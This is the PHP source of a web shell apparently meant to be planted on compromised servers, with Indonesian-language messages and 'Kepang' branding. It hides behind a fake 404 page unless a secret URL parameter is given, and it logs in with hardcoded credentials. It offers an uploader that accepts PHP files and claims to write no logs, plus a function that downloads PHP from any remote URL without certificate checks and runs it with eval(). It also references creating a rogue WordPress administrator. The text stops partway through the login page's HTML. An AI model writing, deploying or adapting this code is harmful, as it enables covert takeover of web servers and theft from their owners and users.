$valid_username = "kepang";$valid_password = "bjorka";$access_param = 'ker';if (!isset($_GET[$access_param])) { header("HTTP/1.0 404 Not Found"); echo "404 - File Not Found"; exit;}session_start();function check_login() { return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;}function login($username, $password) { global $valid_username, $valid_password; if ($username === $valid_username && $password === $valid_password) { $_SESSION['loggedin'] = true; $_SESSION['username'] = $username; return true; } return false;}function logout() { session_destroy(); header("Location: " . $_SERVER['PHP_SELF'] . "?" . 'ker'); exit;}if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) { $username = $_POST['username'] ?? ''; $password = $_POST['password'] ?? ''; if (login($username, $password)) { header("Location: " . $_SERVER['PHP_SELF'] . "?" . 'ker'); exit; } else { $error = "Username atau password salah!"; }}if (isset($_GET['logout'])) { logout();}if (isset($_GET['upload'])) { echo "<pre style='color: #00ff00; background: #000000; font-family: Courier New; padding: 20px; border: 2px solid #00ff00;'>"; echo "╔══════════════════════════════════════════════╗\n"; echo "║ ⚠️ KEPANG JAYA TERMINAL UPLOADER - CHAOS v2 ║\n"; echo "╚══════════════════════════════════════════════╝\n"; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $scriptDir = rtrim(__DIR__, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; $originalName = basename($_FILES['file']['name']); $safeName = preg_replace('/[^A-Za-z0-9.\-_]/', '_', $originalName); $finalName = time() . '_' . $safeName; $target = $scriptDir . $finalName; $ext = strtolower(pathinfo($finalName, PATHINFO_EXTENSION)); $allowedExts = ['php', 'jpg', 'png', 'gif', 'txt', 'dll', 'zip', '7z']; echo "📦 File masuk: $originalName\n"; echo "🔍 Ekstensi: .$ext\n"; if (in_array($ext, $allowedExts)) { if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { @chmod($target, 0644); $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; $scriptDirUrl = rtrim(dirname($_SERVER['SCRIPT_NAME']), '/\\'); $scriptDirUrl = ($scriptDirUrl === '' || $scriptDirUrl === '.') ? '' : $scriptDirUrl . '/'; $fileUrl = $protocol . '://' . $host . '/' . $scriptDirUrl . rawurlencode($finalName); echo "✅ Upload sukses!\n"; echo "📡 Akses file: $fileUrl\n"; echo "🚀 Menjalankan scanner virtual...\n"; echo "[KepangScan] Scanning $finalName...\n"; if ($ext === 'php') { echo "⚠️ File .php terdeteksi. Simulasi backdoor aktif...\n"; echo "[Backdoor] Simulasi akses ke $finalName\n"; } echo "🧾 Mode silent aktif. Tidak ada log tertulis.\n"; } else { echo "❌ Upload gagal. Sistem menolak filemu.\n"; } } else { echo "🚫 Ekstensi .$ext tidak diizinkan oleh protokol Kepang.\n"; } } else { echo "📥 Mode Upload Aktif\n\n"; echo '
'; echo "\n📁 File yang tersedia:\n"; $scriptDir = rtrim(__DIR__, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; $files = scandir($scriptDir); $uploadedFiles = array_filter($files, function($file) use ($scriptDir) { return $file !== '.' && $file !== '..' && $file !== basename($_SERVER['PHP_SELF']) && is_file($scriptDir . $file); }); if (count($uploadedFiles) > 0) { foreach ($uploadedFiles as $file) { echo "• $file\n"; } } else { echo "• Tidak ada file yang diupload\n"; } echo "\n🔗 <a href=\"?ker\" style=\"color: #00ff00;\">Kembali ke Main Menu</a>"; } echo "</pre>"; exit();}function execute_remote_php($url, $method = 'curl') { if (!filter_var($url, FILTER_VALIDATE_URL)) { throw new Exception("URL tidak valid"); } if (parse_url($url, PHP_URL_SCHEME) !== 'https') { throw new Exception("Hanya URL HTTPS yang diizinkan"); } $code = ''; if ($method === 'fileget' && ini_get('allow_url_fopen')) { $context = stream_context_create([ 'http' => [ 'timeout' => 30, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $code = @file_get_contents($url, false, $context); } elseif ($method === 'curl' && function_exists('curl_version')) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ]); $code = curl_exec($ch); $error = curl_error($ch); curl_close($ch); if ($error) { throw new Exception("cURL Error: " . $error); } } else { throw new Exception("Tidak ada method yang tersedia untuk mengambil konten"); } if (empty($code)) { throw new Exception("Konten kosong atau gagal diambil"); } try { ob_start(); eval("".$code); $output = ob_get_clean(); $output = str_replace( 'WordPress Admin created successfully!Username: kepangPassword: kepangjay', 'WordPress Admin created successfully!Username: kepangPassword: jaya', $output ); $output = '<div style="color: #00ff00; font-family: Courier New, monospace; background: #000000; padding: 10px; border: 1px solid #00ff00; border-radius: 5px;">' . $output . '</div>'; return $output; } catch (ParseError $e) { throw new Exception("Error parsing PHP code: " . $e->getMessage()); }}if (!check_login()) { <!DOCTYPE html> <html lang="id"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">